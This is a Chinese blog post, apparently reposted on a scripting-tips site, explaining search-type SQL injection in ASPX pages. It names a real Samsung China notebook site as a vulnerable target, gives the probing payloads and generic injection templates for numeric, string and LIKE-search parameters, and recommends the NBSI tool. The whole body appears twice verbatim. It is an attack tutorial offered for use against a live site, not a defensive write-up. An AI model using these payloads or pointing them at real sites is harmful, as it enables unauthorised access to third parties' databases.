ASPX搜索型注入
發(fā)布日期:2021-12-18 14:25 | 文章來源:腳本之家
櫻木花盜's BLOG
今天看到有個關(guān)于搜索型注入的文章,用到的是一種新技術(shù),探測的是三星:http://notebook.samsung.com.cn/index.aspx
注入方式是:
一般網(wǎng)站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC=
構(gòu)造注入語句 三星%’and 1=1 and ’%’=’
三星%’and 1=2 and ’%’=’
大家看到了吧 兩個返回頁面是不一樣的 說明有注入的漏洞 特征字 寫 筆記本 就是三星%’and 1=1 and ’%’=’ 返回時有的
我們知道一般搜索代碼是這么寫的:
Select * from 表名 where 字段 like ’%關(guān)鍵字%’
這樣就造成了對關(guān)鍵字前后的所有匹配(%是用來全部匹配的)
這里如果關(guān)鍵字沒有過濾的話,就可以這樣來構(gòu)造:
關(guān)鍵字=’ and [查詢條件] and ‘%’=’
這樣查詢就變成
select * from 表名 where 字段 like ’%’ and 1=1 and ’%’=’%’
這樣就很好的構(gòu)成了一個sql注入點(diǎn),當(dāng)然用手工也可以,用nbsi也可以~~
注入是不分家的,沒必要什么型什么型的!~
如果不信,大家請看下面的《sql注入天書》的原話
第一節(jié)、SQL注入的一般步驟
首先,判斷環(huán)境,尋找注入點(diǎn),判斷數(shù)據(jù)庫類型,這在入門篇已經(jīng)講過了。
其次,根據(jù)注入?yún)?shù)類型,在腦海中重構(gòu)SQL語句的原貌,按參數(shù)類型主要分為下面三種:
(A)ID=49 這類注入的參數(shù)是數(shù)字型,SQL語句原貌大致如下:
Select * from 表名 where 字段=49
注入的參數(shù)為ID=49 And [查詢條件],即是生成語句:
Select * from 表名 where 字段=49 And [查詢條件]
(B) Class=連續(xù)劇 這類注入的參數(shù)是字符型,SQL語句原貌大致概如下:
Select * from 表名 where 字段=’連續(xù)劇’
注入的參數(shù)為Class=連續(xù)劇’ and [查詢條件] and ‘’=’ ,即是生成語句:
Select * from 表名 where 字段=’連續(xù)劇’ and [查詢條件] and ‘’=’’
(C) 搜索時沒過濾參數(shù)的,如keyword=關(guān)鍵字,SQL語句原貌大致如下:
Select * from 表名 where 字段like ’%關(guān)鍵字%’
注入的參數(shù)為keyword=’ and [查詢條件] and ‘%’=’, 即是生成語句:
Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’
當(dāng)然手工是麻煩的
用工具的話,我建議用nbsi的工具比較好,就我感覺只有nbsi結(jié)合了這個技術(shù),用別的軟體是不能注入的
注入點(diǎn)只要寫:
http://notebook.samsung.com.cn/news/news.aspx?& ... &ST=title&SC=%
再加個特征字符就可以了
今天看到有個關(guān)于搜索型注入的文章,用到的是一種新技術(shù),探測的是三星:http://notebook.samsung.com.cn/index.aspx
注入方式是:
一般網(wǎng)站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&ST=title&SC=
構(gòu)造注入語句 三星%’and 1=1 and ’%’=’
三星%’and 1=2 and ’%’=’
大家看到了吧 兩個返回頁面是不一樣的 說明有注入的漏洞 特征字 寫 筆記本 就是三星%’and 1=1 and ’%’=’ 返回時有的
我們知道一般搜索代碼是這么寫的:
Select * from 表名 where 字段 like ’%關(guān)鍵字%’
這樣就造成了對關(guān)鍵字前后的所有匹配(%是用來全部匹配的)
這里如果關(guān)鍵字沒有過濾的話,就可以這樣來構(gòu)造:
關(guān)鍵字=’ and [查詢條件] and ‘%’=’
這樣查詢就變成
select * from 表名 where 字段 like ’%’ and 1=1 and ’%’=’%’
這樣就很好的構(gòu)成了一個sql注入點(diǎn),當(dāng)然用手工也可以,用nbsi也可以~~
注入是不分家的,沒必要什么型什么型的!~
如果不信,大家請看下面的《sql注入天書》的原話
第一節(jié)、SQL注入的一般步驟
首先,判斷環(huán)境,尋找注入點(diǎn),判斷數(shù)據(jù)庫類型,這在入門篇已經(jīng)講過了。
其次,根據(jù)注入?yún)?shù)類型,在腦海中重構(gòu)SQL語句的原貌,按參數(shù)類型主要分為下面三種:
(A)ID=49 這類注入的參數(shù)是數(shù)字型,SQL語句原貌大致如下:
Select * from 表名 where 字段=49
注入的參數(shù)為ID=49 And [查詢條件],即是生成語句:
Select * from 表名 where 字段=49 And [查詢條件]
(B) Class=連續(xù)劇 這類注入的參數(shù)是字符型,SQL語句原貌大致概如下:
Select * from 表名 where 字段=’連續(xù)劇’
注入的參數(shù)為Class=連續(xù)劇’ and [查詢條件] and ‘’=’ ,即是生成語句:
Select * from 表名 where 字段=’連續(xù)劇’ and [查詢條件] and ‘’=’’
(C) 搜索時沒過濾參數(shù)的,如keyword=關(guān)鍵字,SQL語句原貌大致如下:
Select * from 表名 where 字段like ’%關(guān)鍵字%’
注入的參數(shù)為keyword=’ and [查詢條件] and ‘%’=’, 即是生成語句:
Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’
當(dāng)然手工是麻煩的
用工具的話,我建議用nbsi的工具比較好,就我感覺只有nbsi結(jié)合了這個技術(shù),用別的軟體是不能注入的
注入點(diǎn)只要寫:
http://notebook.samsung.com.cn/news/news.aspx?& ... &ST=title&SC=%
再加個特征字符就可以了
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章
關(guān)注官方微信